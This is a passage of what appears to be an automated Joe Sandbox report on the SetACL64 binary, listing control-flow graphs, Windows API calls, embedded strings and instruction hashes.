7ff686843611-7ff6868436e8 1860->1899 1882 7ff6868431c8-7ff6868431e2 call 7ff6868540e0 1866->1882 1883 7ff6868431b0-7ff6868431c3 call 7ff686856010 1866->1883 1868->1777 1868->1869 1869->1856 1880 7ff686843179 call 7ff6868621a0 1872->1880 1881 7ff686843160-7ff686843173 1872->1881 1876 7ff68684330b-7ff686843310 call 7ff68687de6c 1874->1876 1877 7ff686843313-7ff686843319 1874->1877 1876->1877 1877->1742 1877->1841 1880->1866 1881->1806 1881->1880 1882->1741 1883->1882 1901 7ff68684360b-7ff686843610 call 7ff6868621a0 1898->1901 1902 7ff6868435f2-7ff686843605 1898->1902 1903 7ff6868436ea-7ff686843701 1899->1903 1904 7ff686843721-7ff6868443dc call 7ff686862180 1899->1904 1901->1899 1902->1901 1905 7ff6868443e3-7ff686844430 call 7ff6868688fc * 13 1902->1905 1909 7ff68684371c call 7ff6868621a0 1903->1909 1910 7ff686843703-7ff686843716 1903->1910 1909->1904 1910->1909 1913 7ff6868443dd-7ff6868443e2 call 7ff6868688fc 1910->1913 1913->1905
                                        APIs
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868434DB
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868434E1
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6868434E7
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686843503
                                        • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686843509
                                          • Part of subcall function 00007FF68684B710: RegEnumKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,000001A1), ref: 00007FF68684B812
                                          • Part of subcall function 00007FF686829520: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF686829606
                                          • Part of subcall function 00007FF686829520: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF68682960C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_taskEnum
                                        • String ID: SetACL finished successfully.$/$Action 'reset children' was used without specifying whether to reset the DACL, SACL, or both. Nothing was reset.$Object path and/or object type not specified.$Prepare$Run$read
                                        • API String ID: 1222371136-710240214
                                        • Opcode ID: 6fd56c362ca3c0bd5d5ac0762c920353aa005472101274b7ea8be5c822556958
                                        • Instruction ID: a746cacaaaafb389c668c461b4964444e1aa38cca4b16b824fc192f3d3691853
                                        • Opcode Fuzzy Hash: 6fd56c362ca3c0bd5d5ac0762c920353aa005472101274b7ea8be5c822556958
                                        • Instruction Fuzzy Hash: D632E2A2B1D782C6EA24DB25D0853BE6365FF45780F40413AE65D876D6DFBEE840C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$Info$CloseErrorLastProcessSecurityShare$BufferCreateCurrentFileFreeHandleNamedOpenToken
                                        • String ID: SeSecurityPrivilege
                                        • API String ID: 4200377542-2333288578
                                        • Opcode ID: 72c4d0f1dcd23645b0fd41c2eee2edcd0e185607ca5a744b2523e201e660a9b5
                                        • Instruction ID: 35b28d8166c50361eac63c5d4dc8efe04d8e99683064944ed3fb8332635ddf5f
                                        • Opcode Fuzzy Hash: 72c4d0f1dcd23645b0fd41c2eee2edcd0e185607ca5a744b2523e201e660a9b5
                                        • Instruction Fuzzy Hash: 884262A2A18782C5EB10CF25D4587AD23A1FF44798F508139DB5E87AD9DF7EE980C360

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 2981 7ff68683da7f-7ff68683dabb SetEvent ReleaseMutex call 7ff6868621a0 2985 7ff68683dac1-7ff68683e829 EnterCriticalSection CloseHandle call 7ff68683e8c0 2981->2985 2986 7ff68683d8d4-7ff68683d8df 2981->2986 3024 7ff68683e84e-7ff68683e853 call 7ff6868688fc 2985->3024 2987 7ff68683d91a-7ff68683d93e 2986->2987 2988 7ff68683d8e1-7ff68683d8fa 2986->2988 2993 7ff68683d97a-7ff68683d985 2987->2993 2994 7ff68683d940-7ff68683d959 2987->2994 2990 7ff68683d8fc-7ff68683d90f 2988->2990 2991 7ff68683d915 call 7ff6868621a0 2988->2991 2990->2991 2997 7ff68683e854-7ff68683e860 call 7ff6868688fc * 3 2990->2997 2991->2987 2995 7ff68683d987-7ff68683d9a0 2993->2995 2996 7ff68683d9c1-7ff68683d9cc 2993->2996 3000 7ff68683d95b-7ff68683d96e 2994->3000 3001 7ff68683d974-7ff68683d979 call 7ff6868621a0 2994->3001 3004 7ff68683d9bb-7ff68683d9c0 call 7ff6868621a0 2995->3004 3005 7ff68683d9a2-7ff68683d9b5 2995->3005 3007 7ff68683da07-7ff68683da40 call 7ff686862180 2996->3007 3008 7ff68683d9ce-7ff68683d9e7 2996->3008 3035 7ff68683e865-7ff68683e866 call 7ff6868688fc 2997->3035 3000->3001 3002 7ff68683e878-7ff68683e87d call 7ff6868688fc 3000->3002 3001->2993 3011 7ff68683e87e-7ff68683e888 call 7ff6868688fc 3002->3011 3004->2996 3005->3004 3005->3011 3015 7ff68683d9e9-7ff68683d9fc 3008->3015 3016 7ff68683da02 call 7ff6868621a0 3008->3016 3034 7ff68683e88a-7ff68683e88c 3011->3034 3011->3035 3015->3016 3015->3024 3016->3007 3024->2997 3037 7ff68683e869-7ff68683e877 call 7ff6868688fc call 7ff686833e30 3034->3037 3038 7ff68683e88e 3034->3038 3035->3037 3037->3002
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CriticalEnterEventMutexReleaseSection
                                        • String ID: %s$UNKNW,
                                        • API String ID: 995701069-1666316639
                                        • Opcode ID: 003888358cd9cecbf61ced5c3771de75027d33bda59ba79a7f963fd78033388b
                                        • Instruction ID: 0410017a460c161042bf2ef77a2c7031cb725082661a18f3f957704836942e76
                                        • Opcode Fuzzy Hash: 003888358cd9cecbf61ced5c3771de75027d33bda59ba79a7f963fd78033388b
                                        • Instruction Fuzzy Hash: AF5191E2A19A86C1EA04DB25D59837D2362FF44B84F415439CA1D8B7A2DF7EEC44C320

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 3329 7ff68683cd0a-7ff68683cd24 call 7ff68683d0a0 call 7ff686834fc0 3334 7ff68683cd26-7ff68683cd2e 3329->3334 3335 7ff68683cd94-7ff68683cd9c 3329->3335 3338 7ff68683cd66-7ff68683cd91 3334->3338 3339 7ff68683cd30-7ff68683cd46 3334->3339 3336 7ff68683cd9e-7ff68683cdb4 3335->3336 3337 7ff68683cdd4-7ff68683cdd9 3335->3337 3340 7ff68683cdb6-7ff68683cdc9 3336->3340 3341 7ff68683cdcf call 7ff6868621a0 3336->3341 3342 7ff68683cdf6-7ff68683ce19 call 7ff686829520 call 7ff68685c0b0 3337->3342 3343 7ff68683cddb-7ff68683cdf1 call 7ff686833f80 3337->3343 3338->3335 3344 7ff68683cd48-7ff68683cd5b 3339->3344 3345 7ff68683cd61 call 7ff6868621a0 3339->3345 3340->3341 3347 7ff68683d084-7ff68683d089 call 7ff6868688fc 3340->3347 3341->3337 3361 7ff68683ce89-7ff68683ce91 3342->3361 3362 7ff68683ce1b-7ff68683ce23 3342->3362 3354 7ff68683cf9c-7ff68683cfd4 RegisterEventSourceW call 7ff68686e62c 3343->3354 3344->3345 3344->3347 3345->3338 3358 7ff68683d08a-7ff68683d08f call 7ff6868688fc 3347->3358 3363 7ff68683cfd9-7ff68683cfe3 3354->3363 3371 7ff68683d090-7ff68683d095 call 7ff6868688fc 3358->3371 3367 7ff68683cec9-7ff68683ceec call 7ff686829520 call 7ff68685bf70 3361->3367 3368 7ff68683ce93-7ff68683cea9 3361->3368 3365 7ff68683ce5b-7ff68683ce86 3362->3365 3366 7ff68683ce25-7ff68683ce3b 3362->3366 3369 7ff68683cff9-7ff68683d004 3363->3369 3370 7ff68683cfe5-7ff68683cff7 call 7ff68686e1f8 call 7ff68683c3a0 3363->3370 3365->3361 3372 7ff68683ce56 call 7ff6868621a0 3366->3372 3373 7ff68683ce3d-7ff68683ce50 3366->3373 3396 7ff68683cf5c-7ff68683cf64 3367->3396 3397 7ff68683ceee-7ff68683cef6 3367->3397 3375 7ff68683ceab-7ff68683cebe 3368->3375 3376 7ff68683cec4 call 7ff6868621a0 3368->3376 3374 7ff68683d006-7ff68683d00a 3369->3374 3370->3374 3372->3365 3373->3358 3373->3372 3382 7ff68683d00c-7ff68683d022 3374->3382 3383 7ff68683d03e-7ff68683d07d LeaveCriticalSection call 7ff686862180 3374->3383 3375->3358 3375->3376 3376->3367 3388 7ff68683d039 call 7ff6868621a0 3382->3388 3389 7ff68683d024-7ff68683d037 3382->3389 3388->3383 3389->3388 3396->3354 3400 7ff68683cf66-7ff68683cf7c 3396->3400 3398 7ff68683cef8-7ff68683cf0e 3397->3398 3399 7ff68683cf2e-7ff68683cf59 3397->3399 3401 7ff68683cf29 call 7ff6868621a0 3398->3401 3402 7ff68683cf10-7ff68683cf23 3398->3402 3399->3396 3403 7ff68683cf97 call 7ff6868621a0 3400->3403 3404 7ff68683cf7e-7ff68683cf91 3400->3404 3401->3399 3402->3371 3402->3401 3403->3354 3404->3371 3404->3403
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$CriticalSection$EnterEventFileLeaveModuleNameRegisterSource
                                        • String ID: DefaultEventSource
                                        • API String ID: 352910984-1672983561
                                        • Opcode ID: 9ab4e8bb403d8240f21ffea30b4f19ad447ea429c625c95da4614829f2c2d001
                                        • Instruction ID: 2341e1106d9bb87b406ea7b9219e5e7204037fb8b3fa904901ebbdec40725e6c
                                        • Opcode Fuzzy Hash: 9ab4e8bb403d8240f21ffea30b4f19ad447ea429c625c95da4614829f2c2d001
                                        • Instruction Fuzzy Hash: 5EA17FA2A14B81C5EF008F38D5593AD2361FF5479CF408639E76C46AEADF7AE990C310

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CriticalSection$EnterLeave$CloseDeregisterEventHandleSource
                                        • String ID:
                                        • API String ID: 1038480651-0
                                        • Opcode ID: 7186af4088bc47e5858a979c3040af2f97af1d69e41cea5f9ceaa15bf5e240b6
                                        • Instruction ID: 01282b4f724d8db2e810c013bc1b0ad67a049cfbad9f96916154a0a70914a905
                                        • Opcode Fuzzy Hash: 7186af4088bc47e5858a979c3040af2f97af1d69e41cea5f9ceaa15bf5e240b6
                                        • Instruction Fuzzy Hash: AD0140B1A5C546CAFA649B15B8A83386351BFC8B42F040539CA8EC62B1CF2FAC44C220

                                        Control-flow Graph

                                        • Executed
                                        • Not Executed
                                        control_flow_graph 3507 7ff68684b710-7ff68684b777 call 7ff686829520 call 7ff68684bc40 3510 7ff68684b779-7ff68684b77d 3507->3510 3511 7ff68684b783-7ff68684b78c 3510->3511 3512 7ff68684bba4-7ff68684bbb6 call 7ff686829720 3510->3512 3511->3512 3513 7ff68684b792-7ff68684b7b1 call 7ff68684a350 3511->3513 3517 7ff68684bbb8-7ff68684bbca 3512->3517 3518 7ff68684bbe9-7ff68684bbf7 3512->3518 3513->3512 3523 7ff68684b7b7-7ff68684b81b call 7ff6868621d4 call 7ff686864d90 RegEnumKeyExW 3513->3523 3520 7ff68684bbcc-7ff68684bbdf 3517->3520 3521 7ff68684bbe4 call 7ff6868621a0 3517->3521 3522 7ff68684bbfa-7ff68684bc20 call 7ff686862180 3518->3522 3524 7ff68684bc27-7ff68684bc2c call 7ff6868688fc 3520->3524 3525 7ff68684bbe1 3520->3525 3521->3518 3536 7ff68684b81f-7ff68684b826 3523->3536 3535 7ff68684bc2d-7ff68684bc32 call 7ff6868688fc 3524->3535 3525->3521 3541 7ff68684bc33-7ff68684bc38 call 7ff6868688fc 3535->3541 3538 7ff68684b82c-7ff68684b849 3536->3538 3539 7ff68684b920-7ff68684b92a 3536->3539 3542 7ff68684b850-7ff68684b858 3538->3542 3543 7ff68684b9df-7ff68684b9e9 3539->3543 3544 7ff68684b930-7ff68684b933 3539->3544 3557 7ff68684bc39-7ff68684bc3f call 7ff686833e30 3541->3557 3542->3542 3546 7ff68684b85a-7ff68684b86a call 7ff686833f80 3542->3546 3549 7ff68684b9eb RegCloseKey 3543->3549 3550 7ff68684b9f1-7ff68684ba02 3543->3550 3547 7ff68684b93c-7ff68684b93f 3544->3547 3548 7ff68684b935-7ff68684b93b RegCloseKey 3544->3548 3567 7ff68684b86c-7ff68684b88c 3546->3567 3568 7ff68684b88e-7ff68684b8a6 call 7ff686830360 3546->3568 3553 7ff68684b97d-7ff68684b98f call 7ff686829720 3547->3553 3554 7ff68684b941-7ff68684b956 3547->3554 3548->3547 3549->3550 3555 7ff68684bb07-7ff68684bb0a 3550->3555 3556 7ff68684ba08-7ff68684ba2e 3550->3556 3578 7ff68684b9c6-7ff68684b9da 3553->3578 3579 7ff68684b991-7ff68684b9a3 3553->3579 3559 7ff68684b958-7ff68684b96b 3554->3559 3560 7ff68684b974-7ff68684b97c call 7ff6868621a0 3554->3560 3562 7ff68684bb0c-7ff68684bb21 3555->3562 3563 7ff68684bb48-7ff68684bb5a call 7ff686829720 3555->3563 3556->3557 3561 7ff68684ba34-7ff68684ba3c 3556->3561 3569 7ff68684bc21-7ff68684bc26 call 7ff6868688fc 3559->3569 3570 7ff68684b971 3559->3570 3560->3553 3572 7ff68684ba3e 3561->3572 3573 7ff68684ba41-7ff68684ba67 call 7ff68682aa20 3561->3573 3574 7ff68684bb23-7ff68684bb36 3562->3574 3575 7ff68684bb3f-7ff68684bb47 call 7ff6868621a0 3562->3575 3591 7ff68684bb5c-7ff68684bb6e 3563->3591 3592 7ff68684bb91-7ff68684bba2 3563->3592 3583 7ff68684b8aa-7ff68684b8ae 3567->3583 3568->3583 3569->3524 3570->3560 3572->3573 3604 7ff68684ba6c-7ff68684babe call 7ff68682ac70 call 7ff68684b710 3573->3604 3605 7ff68684ba69 3573->3605 3574->3569 3587 7ff68684bb3c 3574->3587 3575->3563 3578->3522 3589 7ff68684b9a5-7ff68684b9b8 3579->3589 3590 7ff68684b9c1 call 7ff6868621a0 3579->3590 3594 7ff68684b8e6-7ff68684b91b RegEnumKeyExW 3583->3594 3595 7ff68684b8b0-7ff68684b8c6 3583->3595 3587->3575 3589->3524 3598 7ff68684b9be 3589->3598 3590->3578 3600 7ff68684bb8c call 7ff6868621a0 3591->3600 3601 7ff68684bb70-7ff68684bb83 3591->3601 3592->3512 3592->3522 3594->3536 3602 7ff68684b8c8-7ff68684b8db 3595->3602 3603 7ff68684b8e1 call 7ff6868621a0 3595->3603 3598->3590 3600->3592 3601->3524 3607 7ff68684bb89 3601->3607 3602->3535 3602->3603 3603->3594 3613 7ff68684baf6-7ff68684baff 3604->3613 3614 7ff68684bac0-7ff68684bad6 3604->3614 3605->3604 3607->3600 3613->3556 3617 7ff68684bb05 3613->3617 3615 7ff68684bad8-7ff68684baeb 3614->3615 3616 7ff68684baf1 call 7ff6868621a0 3614->3616 3615->3541 3615->3616 3616->3613 3617->3555
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo_noreturn$CloseEnum
                                        • String ID:
                                        • API String ID: 315095564-0
                                        • Opcode ID: a3d853b96546bdb9a2c2abaa2013f1f5933da85cd711577ccb0fd2a482ac2484
                                        • Instruction ID: f17295a7acbb393cbc26fbf098ac0917ac34fda75c2bf7f700e9551725c7babe
                                        • Opcode Fuzzy Hash: a3d853b96546bdb9a2c2abaa2013f1f5933da85cd711577ccb0fd2a482ac2484
                                        • Instruction Fuzzy Hash: AF61A0B2B18B8189E710CB65E4443AD63A6FF88798F000139DF8C97A99DF7DD851C350

                                        Control-flow Graph

                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CloseCreateErrorFreeHandleLastLibraryThread_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2067211477-0
                                        • Opcode ID: 76804c98ee7f117b6a44088b4c4b934afb96eee452b2a54a362fddb3aa974b5e
                                        • Instruction ID: 4f4e6655c75991c81f382e311add3e66d325f98655b955f22151f194085fd6e3
                                        • Opcode Fuzzy Hash: 76804c98ee7f117b6a44088b4c4b934afb96eee452b2a54a362fddb3aa974b5e
                                        • Instruction Fuzzy Hash: 14217CA1A1D746C7EE14DB65B41C17A62A1BF84B80F040438DB4E8BB65DE3EEC00C720

                                        Control-flow Graph

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: CompareString$try_get_function
                                        • String ID: CompareStringEx
                                        • API String ID: 3689094840-2590796910
                                        • Opcode ID: 6cc9a304ba6e9625a3989606c7bdae2d4dc860ba4e45f28530a020498054dd0b
                                        • Instruction ID: 7bfabdca1d66a2a3f9f3a2324ae164c7a885d269652f01ccad6e996147076fdf
                                        • Opcode Fuzzy Hash: 6cc9a304ba6e9625a3989606c7bdae2d4dc860ba4e45f28530a020498054dd0b
                                        • Instruction Fuzzy Hash: 3611F476A08B81C6D760CB56B4402AAB7A5FBC9B94F54413AEE8D83B59CF3DD850CB40
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: DefaultUser$LocaleNametry_get_function
                                        • String ID: GetUserDefaultLocaleName
                                        • API String ID: 1828775994-151340334
                                        • Opcode ID: 57af316dea5b7e61cb562d8c11244f2537ddf137142906e3d23b94016c7f79ba
                                        • Instruction ID: 05d9bead7f0838353dfe26d75060d3004569bf9f1f0d959f80ae06c94cb722ba
                                        • Opcode Fuzzy Hash: 57af316dea5b7e61cb562d8c11244f2537ddf137142906e3d23b94016c7f79ba
                                        • Instruction Fuzzy Hash: C5F082D0F0D542D2FB159BA5A6816F85262BF897C4F84503EEA0D86A65CE3E9C44C760
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                        • String ID:
                                        • API String ID: 1321466686-0
                                        • Opcode ID: 5f4e593a57be2922c770aa4019cdb3a40b36742acc247e4d38195dbb756052e0
                                        • Instruction ID: 8e55ef543592d83e15f5f4f303edf39ddf02620efcdaf2e0f01c5c7ed0162edb
                                        • Opcode Fuzzy Hash: 5f4e593a57be2922c770aa4019cdb3a40b36742acc247e4d38195dbb756052e0
                                        • Instruction Fuzzy Hash: 50311CA1A18207C2FA54AB24956A3B923A1BF45784F44407DEB4DC72E7DE6FEC04C271
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID: *
                                        • API String ID: 3215553584-163128923
                                        • Opcode ID: fa66ef4454720253ae4a1324ed2750e09e57d66344b9118c59c944b74fb7378b
                                        • Instruction ID: d9db731998cd69f38668c40e0926809cc0251caa76e6e6a7f9c0f6c02a62f5e2
                                        • Opcode Fuzzy Hash: fa66ef4454720253ae4a1324ed2750e09e57d66344b9118c59c944b74fb7378b
                                        • Instruction Fuzzy Hash: FA7183B2968252CAE7685F29805917C3BA6FF05B9CF14013DDB4E832A5DF3ADC61D720
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
                                        • Associated: 00000007.00000002.1713739107.00007FF686820000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713808798.00007FF68688B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713837587.00007FF6868AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        • Associated: 00000007.00000002.1713858003.00007FF6868B7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_7_2_7ff686820000_SetACL64.jbxd
                                        Similarity
                                        • API ID: _invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 3215553584-0
                                        • Opcode ID: 7ee9a919a73c7ad7693c046b3e9b085255df4470bb1e97c6a93af5c9eaf83ccb
                                        • Instruction ID: cb9d928fbc81a6f574a27b2e87fc4c36a9dc7a536c2f28ab6676619084e45aa6
                                        • Opcode Fuzzy Hash: 7ee9a919a73c7ad7693c046b3e9b085255df4470bb1e97c6a93af5c9eaf83ccb
                                        • Instruction Fuzzy Hash: 9331B2F2F1C286C6FE605B15A44427E62A0BF41B90F544138FA6D877D6DEAEEC80C720
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000007.00000002.1713758258.00007FF686821000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF686820000, based on PE: true
